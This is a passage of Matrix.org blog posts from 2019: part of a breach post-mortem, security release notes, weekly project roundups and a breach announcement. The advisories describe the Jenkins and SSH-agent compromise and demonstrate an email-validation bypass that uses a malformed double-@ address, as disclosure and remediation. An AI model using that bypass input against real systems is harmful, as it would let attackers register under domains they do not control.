Whilst the keys were compromised, none of the packages that we distribute were tampered with. However, the impact on the project has been high - particularly for Riot/Android, as we cannot allow the risk of an attacker using the keys to sign and somehow distribute malicious variants of Riot/Android, and Google provides no means of recovering from a compromised signing key beyond creating a whole new app and starting over. Therefore we have lost all our ratings, reviews and download counts on Riot/Android and started over. (If you want to give the newly released app a fighting chance despite this setback, feel free to give it some stars on the Play Store). We also revoked the compromised Synapse & Riot GPG keys and created new ones (and published new instructions for how to securely set up your Synapse or Riot debian repos).

In terms of remediation, designing a secure build process is surprisingly hard, particularly for a geo-distributed team. What we have landed on is as follows:

  • Developers create a release branch to signify a new release (ensuring dependencies are pinned to known good versions).
  • We then perform all releases from a dedicated isolated release terminal (a sketch of the flow follows this list).
    • This is a device which is kept disconnected from the internet, other than when doing a release, and even then it is firewalled to be able to pull data from SCM and push to the package distribution servers, but otherwise entirely isolated from the network.
    • Needless to say, the device is strictly used for nothing other than performing releases.
    • The build environment installation is scripted and installs on a fresh OS image (letting us easily build new release terminals as needed)
    • The signing keys (hardware or software) are kept exclusively on this device.
    • The publishing SSH keys (hardware or software) used to push to the packaging servers are kept exclusively on this device.
    • We physically store the device securely.
    • We ensure someone on the team always has physical access to it in order to do emergency builds.
  • Meanwhile, releases are distributed using dedicated infrastructure, entirely isolated from the rest of production.
    • These live at https://packages.matrix.org and https://packages.riot.im
    • These are minimal machines with nothing but a static web-server.
    • They are accessed only via the dedicated SSH keys stored on the release terminal.
    • These in turn can be mirrored in future to avoid a SPOF (or we could cheat and use Cloudflare’s always online feature, for better or worse).
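
To make that concrete, a release from the terminal might look roughly like this sketch (repo, file and host names hypothetical; the real process is scripted):

  # on the release terminal, during its brief firewalled network window
  git clone --branch release-v1.2.3 https://github.com/example/project.git
  cd project && ./build-packages.sh

  # sign with the key that exists only on this device
  gpg --armor --detach-sign dist/project-1.2.3.tar.gz

  # publish to the isolated distribution host over the dedicated SSH key
  rsync -e "ssh -i ~/.ssh/publish_key" -r dist/ packages.example.org:/srv/packages/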

Alternatives here included:

  • In an ideal world we’d do reproducible builds instead, and sign the build’s hash with a hardware key, but given we don’t have reproducible builds yet this will have to suffice for now.
  • We could delegate building and distribution entirely to a 3rd party setup such as OBS (as per https://github.com/matrix-org/matrix.org/issues/370). However, we have a very wide range of artefacts to build across many different platforms and OSes, so would rather build ourselves if we can.

Dev and CI infrastructure

The main change in our dev and CI infrastructure is to move from Jenkins to Buildkite. The latter has been serving us well for Synapse builds over the last few months, and has now been extended to serve all the main CI pipelines that Jenkins was providing. Buildkite works by orchestrating jobs on an elastic pool of CI workers we host in our own AWS, and so far has done so quite painlessly.

The new pipelines have been set up so that where CI needs to push artefacts to production for continuous deployment (e.g. riot.im/develop), it does so by poking production via HTTPS to trigger production to pull the artefact from CI, rather than pushing the artefact via SSH to production.
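
The poke-to-pull pattern keeps SSH credentials out of CI entirely; a sketch with hypothetical endpoints:

  # CI step: tell production a new build exists (no SSH keys held in CI)
  curl -X POST -H "Authorization: Bearer $DEPLOY_TOKEN" \
      https://deploy.example.com/hooks/riot-develop

  # production reacts by fetching the artifact from CI over HTTPS itself, e.g.:
  #   curl -fL -o riot-develop.tar.gz https://ci.example.com/artifacts/latest

This way a compromised CI worker can at worst trigger a deploy of an artifact production chooses to fetch, rather than push arbitrary content into production.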

Other than CI, our strategy is:

  • Continue using Github for public repositories
  • Use gitlab.matrix.org for private repositories (and stuff which we don’t want to re-export via the US, like Olm)
  • Continue to host docker images on Docker Hub (despite their recent security dramas).

Log minimisation and handling Personally Identifying Information (PII)

Another thing that the breach made painfully clear is that we log too much. While there’s not much evidence of the attacker going spelunking through any Matrix service log files, the fact is that whilst developing Matrix we’ve kept logging on matrix.org relatively verbose to help with debugging. There’s nothing more frustrating than trying to trace through the traffic for a bug only to discover that logging didn’t pick it up.

However, we can still improve our logging and PII-handling substantially:

  • Ensuring that wherever possible, we hash or at least truncate any PII before logging it (access tokens, matrix IDs, 3rd party IDs etc.) - see the sketch after this list.
  • Minimising log retention to the bare minimum we need to investigate recent issues and abuse
  • Ensuring that PII is stored hashed wherever possible.
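
As a sketch of the first point, in Python a logging call can be fed a short, non-reversible fingerprint rather than the raw value:

  import hashlib

  def redact(value: str) -> str:
      # hash and truncate: enough to correlate log lines, useless to an attacker
      return hashlib.sha256(value.encode()).hexdigest()[:8]

  # e.g. log.info("rejected token %s", redact(access_token))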

Meanwhile, in Matrix itself we already are very mindful of handling PII (c.f. our privacy policies and GDPR work), but there is also more we can do, particularly:

  • Turning on end-to-end encryption by default, so that even if a server is compromised, the attacker cannot get at private message history. Everyone who uses E2EE in Matrix should have felt some relief that even though the server was compromised, their message history was safe: we need to provide that to everyone. This is https://github.com/vector-im/riot-web/issues/6779.
  • We need device audit trails in Matrix, so that even if a compromised server (or malicious server admin) temporarily adds devices to your account, you can see what’s going on. This is https://github.com/matrix-org/synapse/issues/5145
  • We need to empower users to configure history retention in their rooms, so they can limit the amount of history exposed to an attacker. This is https://github.com/matrix-org/matrix-doc/pull/1763
  • We need to provide account portability (aka decentralised accounts) so that even if a server is compromised, the users can seamlessly migrate elsewhere. The first step of this is https://github.com/matrix-org/matrix-doc/pull/1228.

Conclusion

Hopefully this gives a comprehensive overview of what happened in the breach, how we handled it, and what we are doing to protect against this happening in future.

Again, we’d like to apologise for the massive inconvenience this caused to everyone caught in the crossfire. Thank you for your patience and for sticking with the project whilst we restored systems. And while it is very unfortunate that we ended up in this situation, at least we should be coming out of it much stronger, particularly in terms of infrastructure security. We’d also like to particularly thank Kade Morton for providing independent review of this post and our remediations, and everyone who reached out with #hugops during the incident (it was literally the only positive thing we had on our radar), and finally thanks to those of the Matrix team who hauled ass to rebuild the infrastructure, and also those who doubled down meanwhile to keep the rest of the project on track.

On which note, we’re going to go back to building decentralised communication protocols and reference implementations for a bit... Emoji reactions are on the horizon (at last!), as is Message Editing, RiotX/Android and a host of other long-awaited features - not to mention finally releasing Synapse 1.0. So: thanks again for flying Matrix, even during this period of extreme turbulence and, uh, hijack. Things should mainly be back to normal now and for the foreseeable.

Given the new blog doesn't have comments yet, feel free to discuss the post over at HN.

Welcome to the 2019 GSoC Participants!

07.05.2019 00:00 — GSoC — Andrew Morgan

It’s that time of year again! Matrix.org is once again participating in the Google Summer of Code program. We have been allocated four student slots by Google this year, and narrowing the 18 proposals we received down to just four was a very difficult task.

In the end, we have decided on the following four students and their proposed projects:

Alexey Andreyev’s proposal involves adding end-to-end encryption to libQMatrixClient for future support in Qt/libQMatrixClient-based clients such as Quaternion and Spectral. They will be mentored by kitsune, lead developer of libQMatrixClient, and our own end-to-end encryption expert, uhoreg.

Kai Hiller’s proposal for more reliable third-party protocol bridges includes adding the ability to notify the user when a message fails to reach its final destination despite being accepted by the bridge. They will be mentored by Half-Shot.

Eisha Chen-yen-su’s proposal for Matrix Visualisations aims to “develop a tool which will visualise the event Directed Acyclic Graph data structure which describes the conversation history in a room. It will be a real-time visualisation of the DAG of a given Matrix room, as seen from the perspective of one or more HomeServers (HSes).” They state that “this tool will be useful for debugging or administration of Matrix HSes by making people able to easily see how the federation process works”. They have already posted prototypes of their tool in #gsoc:matrix.org, and it’s all written in Rust! Which makes their mentor, erikj, very happy.

And finally, Cnly’s proposal for working towards completion of Dendrite’s Client-Server API. The proposal also touches on general improvements to the codebase and increasing test coverage. Cnly will be mentored by babolivier and anoa.

Congratulations to the selected students. We look forward to working with you on completing your projects over the course of the summer.

If your proposal was not selected, do not give up hope! Being an active member of the Matrix community and having a deep understanding of the ecosystem and its projects is a big part of what we look for when choosing candidates. If you stick around, you have a strong chance of being chosen in a subsequent year.

We will not be sharing individuals’ proposal documents, but students are free to share them as they please.

Security updates: Sydent 1.0.3, Synapse 0.99.3.1 and Riot/Android 0.9.0 / 0.8.99 / 0.8.28a

03.05.2019 00:00 — General, Security — Matthew Hodgson

Hi all,

Over the last few weeks we’ve ended up getting a lot of attention from the security research community, which has been incredibly useful and massively appreciated in terms of contributions to improve the security of the reference Matrix implementations.

We’ve also set up an official Security Disclosure Policy to explain the process of reporting security issues to us safely via responsible disclosure - including a Hall of Fame to credit those who have done so. (Please mail security@matrix.org to remind us if we’ve forgotten you!).

Since we published the Hall of Fame yesterday, we’ve already been receiving new entries, and so we’re doing a set of security releases today to ensure the issues are mitigated asap. Unfortunately the work around this means that we’re running late in publishing the post-mortem of the Apr 11 security incident - we are trying to get that out as soon as we can.

Sydent 1.0.3

Sydent 1.0.3 has three security fixes:

  • Ensure that authentication tokens are generated using a secure random number generator, so that they cannot be predicted by an attacker. This is an important fix - please update. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing the issue! (See the sketch after this list.)
  • Mitigate an HTML injection bug where an invalid room_id could result in malicious HTML being injected into validation emails. The fix for this is in the email template itself; you will need to update any customised email templates to be protected. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
  • Randomise session_ids to avoid leaking info about the total number of identity validations, and whether a given ID has been validated. Thanks to @fs0c131y for identifying and responsibly disclosing this one.
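
To sketch the class of fix in the first bullet: in Python, security tokens should come from the secrets module (backed by the OS CSPRNG), never from random, whose output can be predicted if its internal state is recovered:

  import secrets

  # predictable - don't do this for security tokens:
  #   token = "".join(random.choice(string.ascii_letters) for _ in range(32))

  # unpredictable - backed by the operating system's CSPRNG:
  token = secrets.token_urlsafe(32)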

If you are running Sydent as an identity server, you should update as soon as possible from https://github.com/matrix-org/sydent/releases/v1.0.3. We are not aware of any of these issues having been exploited maliciously in the wild.

Synapse 0.99.3.1

Synapse 0.99.3.1 is a security update for two fixes:

  • Ensure that random IDs in Synapse are generated using a secure random number generator, so that they cannot be predicted by an attacker. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue!
  • Add 0.0.0.0/32 and ::/128 to the URL preview blacklist configuration, ensuring that an attacker cannot make connections to localhost. Thanks to Enguerran Gillier (@opnsec) for identifying and responsibly disclosing this issue too!
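
The second fix corresponds to Synapse’s url_preview_ip_range_blacklist option in homeserver.yaml; after the update the relevant section includes the new entries (illustrative excerpt):

  url_preview_ip_range_blacklist:
    - '127.0.0.0/8'
    - '10.0.0.0/8'
    - '172.16.0.0/12'
    - '192.168.0.0/16'
    - '0.0.0.0/32'   # added in 0.99.3.1
    - '::/128'       # added in 0.99.3.1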

You can update from https://github.com/matrix-org/synapse/releases or similar as normal. We are not aware of any of these issues having been exploited maliciously in the wild.

(Synapse 0.99.3.2 was released shortly afterwards to fix a non-security issue with the Debian packaging)

Riot/Android 0.9.x/0.8.99 (Google Play) and 0.8.28a (F-Droid)

Riot/Android has an important security fix which shipped over the course of the last week in various versions of the app:

  • Remove obsolete and buggy ContentProvider which could allow a malicious local app to compromise account data. Many thanks to Julien Thomas (@julien_thomas) from Protektoid Project for identifying this and responsibly disclosing it!

The fix for this shipped on F-Droid since 0.8.28a, and on the Play Store, the fix is present in both v0.9.0 (the first version of the re-published Riot app) and v0.8.99 (the last version of the old Riot app, which told everyone to reinstall). Other forks of Riot which we’re aware of have also been informed and should be updated.

If you haven’t already updated, please do so now.

This Week in Matrix 2019-05-03

03.05.2019 00:00 — This Week in Matrix — Ben Parsons

New matrix.org Security Disclosure Policy and moderation pages

Check out the Matrix Official Security Disclosure Policy, which also features a "Hall of Fame": https://matrix.org/security-disclosure-policy/

We also have an official moderation guide now at https://matrix.org/docs/guides/moderation

Servers

Synapse

Last week

Work progresses on reactions support; expect a more formal MSC real soon now, but for now check out https://github.com/matrix-org/matrix-doc/blob/matthew/msc1849/proposals/1849-aggregations.md for more details. Aside from that, we now have an API to send server notices, support is coming for blacklisting IP ranges for federation traffic, and we published a security disclosure policy and hall of fame: https://matrix.org/security-disclosure-policy/. We’ve also been tracking down some device management bugs that prevent E2E message decryption, as well as fixing some security bugs.

Next week

More reactions work, device management bug hunting and server key validity support.

Crypto

  • Olm 3.1.2 bugfix release.
  • Pantalaimon: Initial SAS support through panctl http://webmshare.com/play/QeBY1
  • Pantalaimon: Support for sending out key requests.

Clients

There are some BIG (capital and bold!) client releases this week - let's take a look.

Quaternion 0.0.9.4

Big release for Quaternion this week, following lots of work on libQMatrixClient. kitsune reports that:

Quaternion is now officially at version 0.0.9.4! Optional native scrollbar for the timeline, files uploading, initial support of matrix.to links (the foundation for future Matrix URIs), first complete translations, and much much more - the long list is here: https://github.com/QMatrixClient/Quaternion/releases/tag/0.0.9.4. Packagers are advised to take a look at the building and packaging section of the release notes: there are a few updates for you there.

Spectral

Continuing the Qt client theme, Black Hat has released a new version of Spectral to Flathub; join #spectral:matrix.org for more:

A new version of Spectral has been released on Flathub this week! The last release was half a year ago, and there have been a lot of changes since then, including a better UI, bug fixes and performance improvements.

Changelog:

  • Increase minimum Qt version to 5.12.
  • Redesigned UI.
  • Emoji and username auto completion in text input.
  • Respect server-side notification settings.
  • Emoji picker.
  • Fix font size in HiDPI.
  • Improved reply UI/UX and rich reply UI.
  • Sending/receiving typing notifications.
  • Switch to hoedown for parsing markdown.
  • Display notification count.
  • Responsive UI.
  • Fix #2 (Room/People separator issue).
  • Infer device name from system information.
  • Image caching.

And of course various performance improvements. For my account, Spectral initially takes ~35MB of RAM, compared to 45-50MB before.

Pattle new release

pattle screenshots

Wilko came to announce a new release of Pattle, the Flutter client:

A new release of Pattle has been pushed to F-droid! Lots of different changes this release, including:

  • Viewing images!
  • Actual local echo (message is immediately placed in the timeline)
  • Sent state indicators are now shown next to the message time (clock for still being sent and a checkmark for sent)
  • Show member change events! (x has joined, left, invited, etc)
  • Thumbnails are now used for chat avatars, which should improve performance a bit
  • Other small fixes :)

Check out a video demo here.

continuum

yuforia reports that:

This week in continuum:

  • Removed support for the embedded webview; external browsers are opened when necessary instead. Many users actually prefer it this way, and the dependency on a fairly large native module is gone.
  • Improved the emoji input: removed some style classes and tweaked some sizes to make the appearance more compact and flat. https://matrix.org/_matrix/media/v1/download/matrix.org/PvFFPAvoDhiHghsyeJnWVyAK

Riot Web

Initial UI work on reactions and editing, nothing usable yet though.

Riot iOS

  • Release of 0.8.5:
    • Grouped notifications
    • Interactive device verification (by emoji)
    • WebRTC and Jitsi libs updates
    • min iOS version is now 10 (Jitsi constraints)
  • Initial UI work on reactions, nothing usable yet though.

Riot Android

Benoit from the Riot team:

  • CI has been configured on Buildkite for the Android Matrix SDK, Riot and RiotX.
  • The Android SDK can now be integrated as a Gradle dependency via JitPack.
  • Riot 0.9.1 has been released with the SAS feature included! Device verification is now easier between Riot Web and Riot Android users, and soon with Riot iOS users too. It will be on the production channel on Monday.
  • We have finally pushed the security fix to GitHub.
  • Also working on the crypto modularization to integrate it into RiotX.
  • We will concentrate our efforts on RiotX now.

RiotX (Android)

  • Working on reactions

Bridges

matrix-appservice-discord searching for a new maintainer

Sorunome reports that:

We (matrix-appservice-discord) are looking for a new maintainer!

What are we looking for in a maintainer?
You wouldn't have to be super active; even a few minutes per day would be greatly appreciated. You'd be responsible for reviewing PRs! Because of this, not being afraid of TypeScript and not being afraid of Discord is required - no need to be at pro level!

So we are basically looking for someone who can help us look over PRs and maybe do some themselves. If you think you're interested, please message us in our Matrix room!

Bridging Facebook Messenger

tulir:

I made a new Facebook Messenger bridge: https://github.com/tulir/mautrix-facebook / #facebook:maunium.net. Currently the main difference from matrix-puppet-facebook is multi-user support, like my WhatsApp and Telegram bridges have. The bridge is written in Python and the code structure is similar to mautrix-telegram's, so I'll probably eventually create a generic bridge library out of the common parts.

SDKs and Frameworks

Ruby SDK

Ananace reports that:

Working on the Ruby SDK again, planning to try and get it to the point where I feel comfortable calling it a provisional 1.0 release. I want to propose additions to various software using it after all, and that tends to look better if it's 1.0 - or close. 😃

That's all I know

That's all for this week folks, come chat in #twim:matrix.org for more, or to share what you've been working on.

PS this interesting-looking project is not ready for public eyes on it yet, so please refrain from checking out the code and discussing with the author in #tangent:matrix.org

This Week in Matrix 2019-04-26

26.04.2019 00:00 — This Week in MatrixNeil Johnson

Hello and welcome

No Ben this week. I'm afraid this means no Matrix Live, but fear not: your Ben-oriented programming will resume next week.

Things that have happened

Riot Android

  • New Riot.im application has been delivered to the PlayStore: https://play.google.com/store/apps/details?id=im.vector.app. It replaces the previous app. More details here: https://medium.com/@RiotChat/riot-im-android-security-update-2b3f655ad739
  • François and Benoit were at AndroidMakers Paris on Tuesday and Wednesday. We saw plenty of interesting talks and came back with many ideas to improve Riot UX/UI/implementation/testing/etc.
  • SAS device verification review is over; it will be merged once we have the tagged olm library.

RiotX (Android)

  • Valere has started working on reactions (which will be implemented only on RiotX for Android).
  • François has worked on merging membership events in the timeline

Riot iOS

  • Interactive device verification has been merged
  • Jitsi and WebRTC updates have been merged
  • Fix bugs in order to prepare a release

Crypto

uhoreg reports that:

olm 3.1.0 has been released. This release adds new functions to help with SAS-based key verification (a.k.a. emoji-based verification) and with cross-signing. The Python bindings are also now available on PyPI, so you can install them using "pip install python-olm", though you need the olm library and development files installed first.
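
For anyone wanting to try the new bindings, a minimal sketch (assuming libolm and its development files are installed, as noted above):

# Create an olm account and inspect its public identity keys.
import olm

account = olm.Account()
print(account.identity_keys)  # {'curve25519': '...', 'ed25519': '...'}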

Also

  • Python-olm available on pypi.
  • Initial SAS verification support for nio.

Spectral

Black Hat reports that:

Spectral's redesign continues, featuring a beautiful responsive UI (not Kirigami yet, sorry) and more functionality. Legacy UI such as the room detail panel has been reworked to fit the redesigned UI better. Basic room upgrade support has been added, allowing you to switch between the old room and the new room. Room settings and user detail dialogs have been added. You can also ignore users from the user detail dialog.

matrix-nsfw

A Black Hat double header this week:

matrix-nsfw has been ported from Golang to Rust. The backend machine learning framework has also been switched to TensorFlow, giving a major performance boost. For anyone who doesn't know what matrix-nsfw is, it is a bot-like utility that detects NSFW images in a room. The new repo is at https://gitlab.com/b0/matrix-nsfw-rust

Neo

Sometimes a picture tells a thousand rainbow-coloured words. Thanks, Foks!

Ruma

Jimmy reports that:

All of Ruma's libraries (but not yet the homeserver itself) are now targeting stable Rust!

continuum

yuforia reports that:

  • If a room member is not visible on screen, updating their name doesn't require switching to the main UI thread
  • Apply formatting when viewing the json source of an event
  • Reuse GUI components to improve performance, update content of views instead of creating new ones
  • Use a hash set to avoid going through the list of room members in some cases
  • Move more of local storage into the database: names and avatars of users and rooms, room membership, recently used accounts, etc.
  • Placeholder avatars are made with GUI components instead of generated bitmap images
  • Switch to gradle multi-project build to modularize

After switching from plaintext files to an embedded database, some components are still in the process of being rewritten. Coming next week: loading messages from the server on demand when scrolling, if they are not yet stored in the database; and support for invitations.

matrix-appservice-discord

Sorunome reports that:

matrix-appservice-discord work has finally resumed! The PRs for both migrating the room and user store to SQL have been merged, and many awesome new things should follow up soon!

Synapse

The reactions and edits API is taking shape, we're making progress on our small homeserver setup, and we're hunting a new set of device key management bugs that came to light while matrix.org was unavailable.

We’ve been a bit disrupted these past few weeks, but work towards Synapse 1.0 continues and we’ll soon be ready to offer a release candidate.

miniVector

Curious Cat reports that:

miniVector 0.8.29 is available on Goldy and Froid (and is unaffected by the Riot/Android re-release drama).

The 'Incident'

We know you'll have a bunch of questions, we'll be publishing a full post-mortem next week. Thanks for bearing with us.

The End

See you next week, it will be Bentastic I can assure you. Be sure to stop by #twim:matrix.org with your updates!

Security Update: Sydent 1.0.2

18.04.2019 00:00 — GeneralMatrix.org Team

Overview

We became aware today of a flaw in sydent's validation of email addresses which can lead to a failure to correctly limit registration to a given email domain. This only affects people who run their own sydent and rely on allowed_local_3pids in their synapse config. We'd like to thank @fs0c131y for bringing it to our attention on Twitter this morning. We are not aware of this being exploited in the wild other than the initial report.

If you are running your own sydent, and limiting signup for your server using the allowed_local_3pids configuration option, then you need to upgrade your sydent immediately to Sydent 1.0.2.

Meanwhile, if you have been relying on the allowed_local_3pids configuration option to restrict access to your homeserver, you may wish to check your homeserver’s user_threepids table for malformed email addresses and your sydent’s database as follows:

$ sqlite3 sydent.db 
sqlite> select count(*) from global_threepid_associations where address like '%@%@%';
0

$ psql matrix
matrix=> select count(*) from user_threepids where address like '%@%@%';
 count 
-------
     0

If the queries return more than 0 results, please let us know at [email protected] - otherwise you are fine.

Details

A flaw existed in sydent whereby it was possible to bypass the requirement specified in synapse's allowed_local_3pids option, which requires that users register with an email address matching a specific format.

This relied on two things:

  1. sydent uses Python's email.utils.parseaddr function to parse the input email address before sending validation mail to it, but it turns out that if you hand parseaddr a malformed email address of the form [email protected]@c.com, it silently discards the @c.com suffix without error. The result of this is that if one requested a validation token for '[email protected]@important.com', the token would be sent to '[email protected]', but the address '[email protected]@important.com' would be marked as validated. This release fixes this behaviour by asserting that the parsed email address is the same as the input email address.
  2. synapse's checking of email addresses relies on regular expressions in the homeserver configuration file. synapse does not validate email addresses before checking them against these regular expressions, so naive regular expressions will match the second domain in email addresses such as the above, causing them to pass the check. Both behaviours are demonstrated below.
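
A quick illustration from a Python shell, using made-up addresses (on Python versions exhibiting the parseaddr quirk described above):

import re
from email.utils import parseaddr

# 1. On affected Python versions, parseaddr silently truncates at
#    the second '@' instead of rejecting the malformed address:
print(parseaddr("attacker@evil.example@important.example"))
# -> ('', 'attacker@evil.example'): the trailing domain is dropped

# 2. A naive allowed_local_3pids-style regular expression still
#    matches the full malformed address, since it only anchors on
#    the final domain:
pattern = re.compile(r"^.*@important\.example$")
print(bool(pattern.match("attacker@evil.example@important.example")))  # True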

You can get sydent 1.0.2 from https://github.com/matrix-org/sydent/releases/tag/v1.0.2.

This Week in Matrix 2019-04-18

18.04.2019 00:00 — This Week in MatrixMatrix.org Team

Welcome to the new blog!

Check out the new digs! We're happy with this newly deployed blog, and all the old and loveable content is right down there. If you find issues, let me know. You may remember Nad from previous editions of Matrix Live - huge thanks to him for his work on the design and upkeep of this new deployment.

Notes from the downtimes

Github tokens

jaywink:

Due to the security incident, all GitHub access tokens for the Scalar GitHub integration were cleared. This means that if you have a GitHub bot in your channel and want to use the !github bot commands, you need to log in to GitHub again via the integration manager menu. Note that existing webhooks are untouched and should work fine without re-authenticating.

Bridges

Half-Shot:

From the matrix.org bridge team: we are resurrecting bridges as fast as possible. Currently running are the freenode, Slack, Gitter and GIMPnet bridges (the latter now hosted on gnome.org), with more to come today and next week.
We have the snoonet and OFTC IRC bridges back. Mozilla is coming soon, hopefully this weekend too!

Whoop! Mozilla is actually up now!

Pattle new release on F-Droid

Wilko:

A big release of Pattle has just been pushed to the F-droid repo! Changes include:

  • Display names are now shown
  • You can now click on chats and view them!
  • Messages are grouped by time and sender (see screenshots)
  • Add fancy transition animation and ripples to chat messages (see video)
  • Use Sentry for error reporting (only Android version and device model is sent, along with the stacktrace of the error)

Also, please note that if you have a matrix.org account and are logged in, you'll probably have to reinstall the app because of the recent matrix.org incident (there's no logout button yet, and no detection of invalidated access tokens).

There has actually been a release since, which includes message sending and viewing image history!

libQMatrixClient 0.5.1.2 && Quaternion 0.0.9.4

kitsune is talking about the long road to 0.0.9.4:

libQMatrixClient 0.5.1.2 has been released, with all the remaining bugfixes for Quaternion 0.0.9.4 that's coming any day soon now. The release notes are here: https://github.com/QMatrixClient/libqmatrixclient/releases/tag/0.5.1.2

Quaternion 0.0.9.4 RC3, the last one before the release that will happen in the coming days, is out. Release notes can be found at https://github.com/QMatrixClient/Quaternion/releases/tag/0.0.9.4-rc3. Translators, you literally have hours to add your translations for 0.0.9.4!

neo

I reimplemented the Matrix SDK in Neo, so it works more nicely. Colors and fonts look nicer (base16-tomorrow, Open Sans), and there's text message sending, with local echo!
I also fixed a bug where React would recycle display-name components across rooms, attributing them to the wrong messages.

There's a video at https://lain.haus/_matrix/media/v1/download/lain.haus/VfshWRfaNUnpGQbdkyYczxvd

Go test Neo at: https://neo.lain.haus/neo

matrix-registration update

ZerataX:

it's been a long while, but I've finally come around to improving matrix-registration
For those of you who have forgotten what this project is about: it basically lets you invite people to your homeserver with tokens, e.g. https://homeserver.tld/register?token=DoubleWizardSky
This whole update was about making the project more user-friendly.
I made a new default registration page that requires zero setup, and you can install the project right from PyPI with pip, so you don't even need to clone the repo any longer.
Check out a live example here: https://chat.dmnd.sh/register
And to play around with the API you can go over to the GitHub page: https://zeratax.github.io/matrix-registration/demo.html?token=ColorWhiskeyExpand
channel: #matrix-registration:dmnd.sh
github: https://github.com/zeratax/matrix-registration

Video available here.
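
As a rough idea of the flow, signing up against such a deployment might look something like the sketch below; the endpoint and field names are assumptions for illustration rather than the project's documented API.

import requests

# Hypothetical token-gated signup call; check matrix-registration's
# own API docs for the real endpoint and field names.
resp = requests.post(
    "https://homeserver.tld/register",
    data={
        "username": "alice",
        "password": "correct horse battery staple",
        "confirm": "correct horse battery staple",
        "token": "DoubleWizardSky",
    },
)
print(resp.status_code)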

matrix-media-repo now has s3 support

TravisR:

matrix-media-repo now has s3 (and s3-like) support, making it easier to archive older media or use minimal disk space. See the new datastores option in the config and the admin docs (https://github.com/turt2live/matrix-media-repo/blob/master/docs/admin.md#datastore-management) for more information.

Dimension

TravisR:

Dimension has been updated to handle more safely the case where upstream integration managers (like Scalar) are offline. Instead of crashing or breaking in various ways, it'll report which integrations are not accessible.
Additionally, due to recent events, if you use matrix.org bots or bridges in Dimension then go to the admin section and log everyone out using the red button. Dimension caches upstream tokens and isn't smart enough to realize that they are no longer valid, which means they need clearing. Clients should automatically handle getting new tokens in the background.

Riot iOS

  • Interactive device verification is still in progress
  • Update WebRTC and Jitsi libs (in progress)

Riot Android

  • We are finalizing the SAS device verification feature
  • We are preparing a release to fix some issues

RiotX (Android)

  • We can now clear the cache of the application (Riot legacy feature)
  • Sync filter has been implemented
  • François is working on video thumbnails (upload and preview) in the timeline

That's all I know

See you next week, and be sure to stop by #twim:matrix.org with your updates!

We have discovered and addressed a security breach. (Updated 2019-04-12)

11.04.2019 00:00 — GeneralMatrix.org Team

Update: for the full story here, please see the post mortem.

Here's what you need to know.

TL;DR: An attacker gained access to the servers hosting Matrix.org. The intruder had access to the production databases, potentially giving them access to unencrypted message data, password hashes and access tokens. As a precaution, if you're a matrix.org user you should change your password now.

The matrix.org homeserver has been rebuilt and is running securely; bridges and other ancillary services (e.g. this blog) will follow as soon as possible. Modular.im homeservers have not been affected by this outage.

The security breach is not a Matrix issue.

The hacker exploited a vulnerability in our production infrastructure (specifically a slightly outdated version of Jenkins). Homeservers other than matrix.org are unaffected.

How does this affect me?

We have invalidated all of the active access tokens for users on Matrix.org - all users have been logged out.

Users with Matrix.org accounts should:

  • Change your password now - no plaintext Matrix passwords were leaked, but weak passwords could still be cracked from the hashed passwords
  • Change your NickServ password (if you're using IRC bridging) - there's no evidence bridge credentials were compromised, but if you have given the IRC bridges credentials to your NickServ account we would recommend changing this password

And as a reminder, it's good practice to:

  • Review your device list regularly - make sure you recognise all of the devices connected to your account
  • Always make sure you enable E2E encryption for private conversations

What user data has been accessed?

Forensics are ongoing; so far we've found no evidence of large quantities of data being downloaded. The attacker did have access to the production database, so unencrypted content (including private messages, password hashes and access tokens) may be compromised.

What has not been affected?

  • Source code and packages have not been impacted based on our initial investigations. However, we will be replacing signing keys as a precaution.
  • Modular.im servers are not affected, based on our initial analysis
  • Identity server data does not appear to have been compromised

The target appeared to be internal credentials for onward exploits, not end user information from the matrix.org homeserver.

You might have lost access to your encrypted messages.

As we had to log out all users from matrix.org, if you do not have backups of your encryption keys you will not be able to read your encrypted conversation history. However, if you use server-side encryption key backup (the default in Riot these days) or take manual key backups, you’ll be okay.

This was a difficult choice to make. We weighed the risk of some users losing access to encrypted messages against that of all users' accounts being vulnerable to hijack via the compromised access tokens. We hope you can see why we made the decision to prioritise account integrity over access to encrypted messages, but we're sorry for the inconvenience this may have caused.

What happened?

We were using Jenkins for continuous integration (automatically testing our software). The version of Jenkins we were using had a vulnerability (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002) which allowed an attacker to hijack credentials (forwarded ssh keys), giving access to our production infrastructure. Thanks to @jaikeysarraf for drawing this to our attention.

Timeline

March 13th Updated 2019-04-12 11:00 UTC

  • Attacker compromises Jenkins CI server

April 4th Updated 2019-04-12 11:00 UTC

  • Attacker gains access to production infrastructure by hijacking a forwarded SSH agent when its owner logged into the compromised Jenkins worker

April 9th

  • Jenkins vulnerability brought to our attention by @jaikeysarraf

April 10th

  • Investigation identified the compromised machines and the full scope of the attack
  • Jenkins was removed
  • Attacker's access to compromised machines was removed

April 11th

  • Matrix.org was taken offline and production infrastructure fully rebuilt
  • Having fully flushed out the attacker, external communication was published informing users and advising on next steps
  • Matrix.org homeserver restored, with bridges and ancillary services (e.g. this blog) following as soon as possible

Update 2019-04-12

At around 5am UTC on Apr 12, the attacker used a Cloudflare API key to repoint DNS for matrix.org to a defacement website (https://github.com/matrixnotorg/matrixnotorg.github.io). The API key was known to have been compromised in the original attack, and should have been replaced during the rebuild. Unfortunately, only personal keys were rotated, enabling the defacement. We are currently double-checking that all compromised secrets have been rotated.

The rebuilt infrastructure itself is secure, however, and the DNS issue has been solved without further abuse. If you have already changed your password, you do not need to do so again.

The defacement confirms that encrypted password hashes were exfiltrated from the production database, so it is even more important for everyone to change their password. We will shortly be messaging and emailing all users to announce the breach and advise them to change their passwords. We will also look at ways of non-destructively forcing a password reset at next login.

The attacker has also posted github issues detailing some of their actions and suggested remediations at https://github.com/matrix-org/matrix.org/issues/created_by/matrixnotorg.

This confirms that GPG keys used for signing packages were compromised. These keys are used for signing the synapse Debian repository (AD0592FE47F0DF61) and releases of Riot/Web (E019645248E8F4A1). Both keys have now been revoked. The window of compromise for the keys started on April 4th; there have been no Synapse releases since then. There has been one release of Riot/Web (1.0.7); however, as the key was protected by a passphrase, and based on our initial analysis of the release, we believe it to be secure.

What are we doing to prevent this in future?

